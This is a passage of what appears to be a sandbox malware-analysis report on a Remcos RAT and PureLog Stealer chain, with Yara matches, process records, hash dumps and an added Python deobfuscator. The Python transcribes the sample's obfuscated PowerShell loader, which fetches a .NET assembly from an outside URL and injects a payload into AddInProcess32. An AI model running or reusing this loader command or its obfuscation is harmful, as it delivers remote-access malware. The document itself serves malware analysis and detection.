                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2268054152.000001B09FD47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:04:58:06
                                      Start date:26/09/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      Imagebase:0x130000
                                      File size:43'008 bytes
                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:6
                                      Start time:04:58:06
                                      Start date:26/09/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      Imagebase:0x320000
                                      File size:43'008 bytes
                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:7
                                      Start time:04:58:06
                                      Start date:26/09/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      Imagebase:0x6e0000
                                      File size:43'008 bytes
                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

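The two PowerShell command lines above carry the whole loader. Target ID 2 only base64-decodes $Codigo and hands the text to a second powershell.exe with -executionpolicy bypass; Target ID 4 is that text, and it hides its logic in three layers: `(get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn''` indexes the name of the only default variable matching *MDr*, $MaximumDriveCount, to spell iex; the script is split into 'a'+'b'+... fragments; and two -replace operators restore the quotes (c9I becomes ') and the dollar signs (k8f becomes $) only after concatenation, so the fragments never contain $url or 'RunPE.Home'. The block below is an added example, not code from the report or from the sample: it performs those three steps statically, without running anything, and pulls the indicators out of the recovered script. Its only assumption is the constructed list of default variable names, which models a Windows PowerShell 5.1 session (where $MaximumDriveCount exists). The result ties the rest of the report together: the first argument to RunPE.Home.VAI() is the paste.ee URL written backwards, matching the GET /d/WksSo/0 in the network section, and the fifth argument names AddInProcess32, the .NET utility that appears three times below it with no command-line arguments and carries the Remcos Yara hits at 0x400000 in Target ID 7.

```python
import re
from fnmatch import fnmatchcase

# The -command argument of the stage-2 PowerShell (Target ID 4 above), transcribed from the report.
STAGE2_COMMAND = r""". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"""

# Constructed subset of the preference variables a fresh Windows PowerShell 5.1 session
# exposes; enough to resolve the wildcard used here. Assumption: the sandbox ran 5.1.
DEFAULT_VARIABLE_NAMES = [
    "MaximumAliasCount", "MaximumDriveCount", "MaximumErrorCount", "MaximumFunctionCount",
    "MaximumHistoryCount", "MaximumVariableCount", "ErrorActionPreference", "PSVersionTable",
]


def resolve_get_variable_alias(cmd):
    """Resolve ((get-variable '<glob>').Name[i,j,k] -join '') to the cmdlet name it spells."""
    m = re.search(r"\(get-variable\s+'([^']*)'\)\.name\[([\d,]+)\]\s*-join\s*''", cmd, re.I)
    if not m:
        return None
    pattern = m.group(1).lower()          # Get-Variable wildcards are case-insensitive
    hits = [n for n in DEFAULT_VARIABLE_NAMES if fnmatchcase(n.lower(), pattern)]
    if len(hits) != 1:
        raise ValueError(f"wildcard {pattern!r} matched {hits}")
    return "".join(hits[0][int(i)] for i in m.group(2).split(","))


def powershell_chars(expr):
    """Build the string that [CHaR]99+[CHaR]57+... evaluates to."""
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", expr, re.I))


def literal_or_chars(token):
    """A '...' literal yields its text; a ([CHaR]n+...) group is evaluated."""
    token = token.strip().strip("()").strip()
    if token.startswith("'") and token.endswith("'"):
        return token[1:-1]
    return powershell_chars(token)


def collect_replacements(cmd):
    """(pattern, replacement) pairs from every -replace/-creplace/-ireplace, in source order."""
    pat = r"-[ci]?replace\s*(\([^)]*\)|'[^']*')\s*,\s*(\[char\]\d+|'[^']*')"
    return [(literal_or_chars(a), literal_or_chars(b)) for a, b in re.findall(pat, cmd, re.I)]


def longest_concat(cmd):
    """Join the literals of the longest 'a'+'b'+... chain; that chain is the payload script."""
    chains = re.finditer(r"'[^']*'(?:\s*\+\s*'[^']*')+", cmd)
    best = max(chains, key=lambda m: len(m.group(0)))
    return "".join(re.findall(r"'([^']*)'", best.group(0)))


def deobfuscate(cmd):
    """Rebuild what '. iex' receives: concatenate first, then apply the -replace chain in order."""
    script = longest_concat(cmd)
    for pattern, repl in collect_replacements(cmd):
        script = script.replace(pattern, repl)
    return resolve_get_variable_alias(cmd), script


def extract_iocs(script):
    """Pull the indicators an analyst needs from the recovered stage-2 script."""
    loader_url = re.search(r"https?://[^\s']+", script).group(0)
    type_name = re.search(r"GetType\('([^']*)'\)", script).group(1)
    method_name = re.search(r"GetMethod\('([^']*)'\)", script).group(1)
    args_src = re.search(r"Invoke\(\$null,\s*\[object\[\]\]@\((.*)\)\)", script).group(1)
    args = re.findall(r"'([^']*)'", args_src)
    return {
        "loader_url": loader_url,              # hosts the base64 .NET loader assembly
        "entrypoint": (type_name, method_name),
        "payload_url": args[0][::-1],          # first VAI() argument is the URL spelled backwards
        "inject_into": args[4],                # process the loader hollows for the payload
        "args": args,
    }


if __name__ == "__main__":
    invoker, script = deobfuscate(STAGE2_COMMAND)
    print(invoker, script, extract_iocs(script), sep="\n")
```

Because the quote and dollar characters are restored by -replace after concatenation, signatures that key on literal `$`-prefixed variable names or quoted strings in the command line see neither; the concatenation fragments, the [CHaR] arithmetic and the reversed URL are the stable features to detect.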
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2331046647.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                        • Instruction ID: 6e374bd9570e1b9cb0c875531fc409f51556b48d2f0797013b42f0dbfba11436
                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                        • Instruction Fuzzy Hash: B601677121CB0D8FD744EF0CE491AA6B7E0FB95364F10056DE58AC3651D636E882CB45
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2331046647.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,P_^$-P_^
                                        • API String ID: 0-2410056697
                                        • Opcode ID: 5983a56bd7199e264252c10765600f874b276619b9f4762f68a06fac3cde76d4
                                        • Instruction ID: 1e3bc62b8aa232cdd3408bf21c2a7d4e8514f45a53c3edb2f4be5298e6df03c4
                                        • Opcode Fuzzy Hash: 5983a56bd7199e264252c10765600f874b276619b9f4762f68a06fac3cde76d4
                                        • Instruction Fuzzy Hash: 365154D7A0D7D65EE722563C68FA1D93F99DF5327870900B7C6D8CA093ED0C381AA251
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2331046647.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fec8546f5f9fc0dee62e51988578f19cc553c2877c99b573dffdfb1202811f11
                                        • Instruction ID: 45a3477b92f52e14f263c407e685920105db945dde11944e0083350a615ae67f
                                        • Opcode Fuzzy Hash: fec8546f5f9fc0dee62e51988578f19cc553c2877c99b573dffdfb1202811f11
                                        • Instruction Fuzzy Hash: 457144A6A0D7D65EE7635A785CB649A7F99DF1322470900B7C6C4CF4D3DE0C280BA362
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2331046647.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 533ef5b38e4efe5f5469a91468233ce67cc63f52f472ca7a990eefd4a3b563d3
                                        • Instruction ID: c75e6a317ab3033101b2bbd8e0fe4b0d50fdcb23a01cf0541454d96ad1a49612
                                        • Opcode Fuzzy Hash: 533ef5b38e4efe5f5469a91468233ce67cc63f52f472ca7a990eefd4a3b563d3
                                        • Instruction Fuzzy Hash: 5F511466A0D7D25EE263AA7868F54DA3FA5DF4312470900F7C6D4CF093DE0D644BA3A1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba5da8ca2e568370af4f51d5c8e6bbc7dd59ff4c248629be7e2dbf68f8a0e0e0
                                        • Instruction ID: 63cb49f19c775f6168a34cd8a5a4e57a25ff5e964d8e7fdcaa4ba23338bdaf08
                                        • Opcode Fuzzy Hash: ba5da8ca2e568370af4f51d5c8e6bbc7dd59ff4c248629be7e2dbf68f8a0e0e0
                                        • Instruction Fuzzy Hash: 96F1F6B2A0D6898FDB91DB58C8A66E97BF0EF17311F0400BBC149D7193DE2C6846DB91
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f19bffaaa0be94dcef3b904b830917c58eb21a6eba584432699339768ae1a39
                                        • Instruction ID: cf51f9b4dea9cea7ea16bab1b345839f8c01ed5ddabde1de2225d2a5f1dab125
                                        • Opcode Fuzzy Hash: 0f19bffaaa0be94dcef3b904b830917c58eb21a6eba584432699339768ae1a39
                                        • Instruction Fuzzy Hash: 1B912662B0EB860FE796972858A52643BE0EF6B310F5900FFD58DCB293DD1DAC068351
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2bd858ed2b2058015d9dfcdb48e65a6b1f73c06ff15a8d00692f184c79eb7c7
                                        • Instruction ID: 16c3299f248619dd968e5b4e6527981ef246225da36f8d3cd7a2a0d15c67fb5e
                                        • Opcode Fuzzy Hash: b2bd858ed2b2058015d9dfcdb48e65a6b1f73c06ff15a8d00692f184c79eb7c7
                                        • Instruction Fuzzy Hash: 2131091270EBC90FD397932C68A41647BE1EBAB62170902FBC089C72A3DD0D9C0A8351
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf84740435b90aaf485780d23781552a0a6e71bb3eb783fa28e81f569a4699b1
                                        • Instruction ID: 3428d607e0b87d57d1b59e72d0b7b4d201de7a5dd237d2cca6a49d0fc6b9fd7b
                                        • Opcode Fuzzy Hash: cf84740435b90aaf485780d23781552a0a6e71bb3eb783fa28e81f569a4699b1
                                        • Instruction Fuzzy Hash: 7721E632B0DD2D4FEBA0965C68651F9B3D1FF9A320B1802B7D50ED3293DD1DA8129380
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b2d9f8206010e7809212682ec316e243e0780756b676c5dce7bc27e43d2fa53
                                        • Instruction ID: bd04c6f72cd3ede835ea4dea6e0628554ffa95d8bede9fdd74f3303cb316e042
                                        • Opcode Fuzzy Hash: 5b2d9f8206010e7809212682ec316e243e0780756b676c5dce7bc27e43d2fa53
                                        • Instruction Fuzzy Hash: 8A21F912F0EE8A0FF3D6972814B437996C2EF9A360B5804BEC74CC72A7DD1D9805A301
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbadd2fb954059edba017e9d286126b0382876afd9daddbc12c632c4f407697c
                                        • Instruction ID: 4964d60a8516b378027b9a3ee0f045b65a85690a5ed27a8bbfd8438d0a44cf93
                                        • Opcode Fuzzy Hash: fbadd2fb954059edba017e9d286126b0382876afd9daddbc12c632c4f407697c
                                        • Instruction Fuzzy Hash: 1411E77190868D8FDB91DF78889A6E97FF0FF15301F0441AAD948C7152DB38A594D7C0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14519e921102746a586ca7a2ccba9c94f822801dd3536a8d90bbab63678df340
                                        • Instruction ID: 7ba47bcb5a74549688c4cad70e00a0b0fed811d19410b289fbad4b012a7f3ea4
                                        • Opcode Fuzzy Hash: 14519e921102746a586ca7a2ccba9c94f822801dd3536a8d90bbab63678df340
                                        • Instruction Fuzzy Hash: 6401447121CB088FD744EF4CE451AA5B7E0FB95364F50056DE58AC3651D626E881CB45
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db1e74886a885c2f0856d8857494e65a5ec82677b0ac2d36d91bc21afe3cceaf
                                        • Instruction ID: 24f600ce01d23aafc9453423a7d51de2fef563b78da1a6ef4579622ab6d5a014
                                        • Opcode Fuzzy Hash: db1e74886a885c2f0856d8857494e65a5ec82677b0ac2d36d91bc21afe3cceaf
                                        • Instruction Fuzzy Hash: B9F08223F4D95E0AF6A0965C38661FA9281EFAB72075902B7D64DD3353EC18AC154381
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb2b19390777468327e0a704348f01a07564a77b8f7d3b8f626d321cbfeaa095
                                        • Instruction ID: 17d6c1ca5d6e96aa06330d8fbe6b69e5631531d8b54115620056f84083395159
                                        • Opcode Fuzzy Hash: bb2b19390777468327e0a704348f01a07564a77b8f7d3b8f626d321cbfeaa095
                                        • Instruction Fuzzy Hash: B6D09230A0490DDF8F90EF58D481AEE7BA1FB58311F5045A6E90CC3654CB35E5A18B80
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76a1c15d66001063478a87b94d7a2a05d9bd145466cb58bd5873276b617462c3
                                        • Instruction ID: c22d7624ea503094bc61590ab32867b1eb87622ecf95adc595b7223a692ed91c
                                        • Opcode Fuzzy Hash: 76a1c15d66001063478a87b94d7a2a05d9bd145466cb58bd5873276b617462c3
                                        • Instruction Fuzzy Hash: A25112A284E7C14FE7038B709CB55907FB0AF13224B4E45EBC4D5CF0A3E6596A5AD362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$+$,$2
                                        • API String ID: 0-1848480385
                                        • Opcode ID: 156cd360c4b24cb2d2fe3443a5e8208133aba50417f032ad119c4fc55da26e9e
                                        • Instruction ID: 2d043af2e7cafb59be07f6db7e9dbe6d3a18a4bb8e54fa1219e6d694f4913d89
                                        • Opcode Fuzzy Hash: 156cd360c4b24cb2d2fe3443a5e8208133aba50417f032ad119c4fc55da26e9e
                                        • Instruction Fuzzy Hash: B7114CB1E0821ACFE714DF54C8A43F9BBF1BF42314F5085A9C10997296CBB93A46DB91

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:5.4%
                                        Total number of Nodes:1269
                                        Total number of Limit Nodes:35
                                        execution_graph 47095 434887 47096 434893 ___BuildCatchObject 47095->47096 47122 434596 47096->47122 47098 43489a 47100 4348c3 47098->47100 47420 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47098->47420 47107 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47100->47107 47421 444251 5 API calls ___crtLCMapStringA 47100->47421 47102 4348dc 47104 4348e2 ___BuildCatchObject 47102->47104 47422 4441f5 5 API calls ___crtLCMapStringA 47102->47422 47105 434962 47133 434b14 47105->47133 47107->47105 47423 4433e7 36 API calls 6 library calls 47107->47423 47115 434984 47116 43498e 47115->47116 47425 44341f 28 API calls _Atexit 47115->47425 47118 434997 47116->47118 47426 4433c2 28 API calls _Atexit 47116->47426 47427 43470d 13 API calls 2 library calls 47118->47427 47121 43499f 47121->47104 47123 43459f 47122->47123 47428 434c52 IsProcessorFeaturePresent 47123->47428 47125 4345ab 47429 438f31 10 API calls 4 library calls 47125->47429 47127 4345b0 47132 4345b4 47127->47132 47430 4440bf 47127->47430 47130 4345cb 47130->47098 47132->47098 47496 436e90 47133->47496 47136 434968 47137 4441a2 47136->47137 47498 44f059 47137->47498 47139 434971 47142 40e9c5 47139->47142 47140 4441ab 47140->47139 47502 446815 36 API calls 47140->47502 47504 41cb50 LoadLibraryA GetProcAddress 47142->47504 47144 40e9e1 GetModuleFileNameW 47509 40f3c3 47144->47509 47146 40e9fd 47524 4020f6 47146->47524 47149 4020f6 28 API calls 47150 40ea1b 47149->47150 47530 41be1b 47150->47530 47154 40ea2d 47556 401e8d 47154->47556 47156 40ea36 47157 40ea93 47156->47157 47158 40ea49 47156->47158 47562 401e65 47157->47562 47819 40fbb3 118 API calls 47158->47819 47161 40eaa3 47165 401e65 22 API calls 47161->47165 47162 40ea5b 47163 401e65 22 API calls 47162->47163 47164 40ea67 47163->47164 47820 410f37 36 API calls __EH_prolog 47164->47820 47166 40eac2 47165->47166 47567 40531e 
47166->47567 47169 40ead1 47572 406383 47169->47572 47170 40ea79 47821 40fb64 78 API calls 47170->47821 47174 40ea82 47822 40f3b0 71 API calls 47174->47822 47180 401fd8 11 API calls 47182 40eefb 47180->47182 47181 401fd8 11 API calls 47183 40eafb 47181->47183 47424 4432f6 GetModuleHandleW 47182->47424 47184 401e65 22 API calls 47183->47184 47185 40eb04 47184->47185 47589 401fc0 47185->47589 47187 40eb0f 47188 401e65 22 API calls 47187->47188 47189 40eb28 47188->47189 47190 401e65 22 API calls 47189->47190 47191 40eb43 47190->47191 47192 40ebae 47191->47192 47823 406c1e 47191->47823 47194 401e65 22 API calls 47192->47194 47199 40ebbb 47194->47199 47195 40eb70 47196 401fe2 28 API calls 47195->47196 47197 40eb7c 47196->47197 47200 401fd8 11 API calls 47197->47200 47198 40ec02 47593 40d069 47198->47593 47199->47198 47204 413549 3 API calls 47199->47204 47201 40eb85 47200->47201 47828 413549 RegOpenKeyExA 47201->47828 47203 40ec08 47205 40ea8b 47203->47205 47596 41b2c3 47203->47596 47211 40ebe6 47204->47211 47205->47180 47209 40ec23 47212 40ec76 47209->47212 47613 407716 47209->47613 47210 40f34f 47911 4139a9 30 API calls 47210->47911 47211->47198 47831 4139a9 30 API calls 47211->47831 47214 401e65 22 API calls 47212->47214 47218 40ec7f 47214->47218 47217 40f365 47912 412475 65 API calls ___scrt_fastfail 47217->47912 47227 40ec90 47218->47227 47228 40ec8b 47218->47228 47221 40ec42 47832 407738 30 API calls 47221->47832 47222 40ec4c 47223 401e65 22 API calls 47222->47223 47236 40ec55 47223->47236 47224 40f36f 47226 41bc5e 28 API calls 47224->47226 47231 40f37f 47226->47231 47230 401e65 22 API calls 47227->47230 47835 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47228->47835 47229 40ec47 47833 407260 98 API calls 47229->47833 47234 40ec99 47230->47234 47722 413a23 RegOpenKeyExW 47231->47722 47617 41bc5e 47234->47617 47236->47212 47240 40ec71 47236->47240 47237 40eca4 47621 401f13 47237->47621 47834 407260 98 API calls 47240->47834 47244 401f09 11 API 
calls 47246 40f39c 47244->47246 47248 401f09 11 API calls 47246->47248 47250 40f3a5 47248->47250 47249 401e65 22 API calls 47251 40ecc1 47249->47251 47725 40dd42 47250->47725 47256 401e65 22 API calls 47251->47256 47255 40f3af 47257 40ecdb 47256->47257 47258 401e65 22 API calls 47257->47258 47259 40ecf5 47258->47259 47260 401e65 22 API calls 47259->47260 47261 40ed0e 47260->47261 47263 401e65 22 API calls 47261->47263 47292 40ed7b 47261->47292 47262 40ed8a 47264 40ed93 47262->47264 47293 40ee0f ___scrt_fastfail 47262->47293 47267 40ed23 _wcslen 47263->47267 47265 401e65 22 API calls 47264->47265 47266 40ed9c 47265->47266 47268 401e65 22 API calls 47266->47268 47270 401e65 22 API calls 47267->47270 47267->47292 47272 40edae 47268->47272 47269 40ef06 ___scrt_fastfail 47896 4136f8 RegOpenKeyExA 47269->47896 47271 40ed3e 47270->47271 47275 401e65 22 API calls 47271->47275 47274 401e65 22 API calls 47272->47274 47276 40edc0 47274->47276 47277 40ed53 47275->47277 47280 401e65 22 API calls 47276->47280 47836 40da34 47277->47836 47278 40ef51 47279 401e65 22 API calls 47278->47279 47281 40ef76 47279->47281 47283 40ede9 47280->47283 47643 402093 47281->47643 47286 401e65 22 API calls 47283->47286 47285 401f13 28 API calls 47288 40ed72 47285->47288 47289 40edfa 47286->47289 47291 401f09 11 API calls 47288->47291 47894 40cdf9 45 API calls _wcslen 47289->47894 47290 40ef88 47649 41376f RegCreateKeyA 47290->47649 47291->47292 47292->47262 47292->47269 47633 413947 47293->47633 47297 40eea3 ctype 47302 401e65 22 API calls 47297->47302 47298 40ee0a 47298->47293 47300 401e65 22 API calls 47301 40efaa 47300->47301 47655 43baac 47301->47655 47303 40eeba 47302->47303 47303->47278 47307 40eece 47303->47307 47306 40efc1 47899 41cd9b 87 API calls ___scrt_fastfail 47306->47899 47309 401e65 22 API calls 47307->47309 47308 40efe4 47313 402093 28 API calls 47308->47313 47311 40eed7 47309->47311 47314 41bc5e 28 API calls 47311->47314 47312 40efc8 CreateThread 47312->47308 48775 41d45d 10 API 
